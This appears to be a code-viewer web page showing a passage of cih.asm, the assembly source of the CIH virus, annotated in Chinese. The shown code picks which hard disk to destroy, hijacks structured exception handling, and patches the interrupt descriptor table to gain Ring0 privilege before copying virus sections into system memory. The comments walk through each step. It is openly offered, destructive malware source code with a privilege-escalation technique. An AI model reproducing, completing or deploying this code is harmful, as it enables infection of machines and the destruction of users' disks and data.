📄 cih.asm
字号:
IF DEBUG ;是否是调试用
FirstKillHardDiskNumber = 81h ;杀掉第二个硬盘“d:”
HookExceptionNumber = 05h ;使用5号中断
ELSE
FirstKillHardDiskNumber = 80h ;杀掉第一个硬盘“c:”
HookExceptionNumber = 03h ;使用3号中断
ENDIF
FileNameBufferSize = 7fh
; *********************************************************
; *********************************************************
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************
MyVirusStart:
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax, fs:[ebx]
call @0
@0:
pop ebx ;获取程序起始偏移量?
;用此偏移量+相对偏移量获得绝对地址(病毒程序大量用到)
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address ?;获得中断描述符表的基址到ebx
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0 ;计算要用中断的基址到ebx
cli ;在改表项前关中断?
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point ?;取得中断基址到ebp
lea esi, MyExceptionHook-@1[ecx]
push esi ?;esi为病毒中断例程地址
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address;修改中断基址使指向病毒中断例程
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateException;以中断的方式进入0级
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
push esi
mov esi, eax ;esi指向病毒开始处
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep movsb ;拷贝病毒代码到分配好的系统内存首址
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ;拷贝结束
jmp LoopOfMergeAllVirusCodeSection ;拷贝下一段
QuitLoopOfMergeAllVirusCodeSection:
pop esi
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Aga
;再一次进入0级
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti ;开中断
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -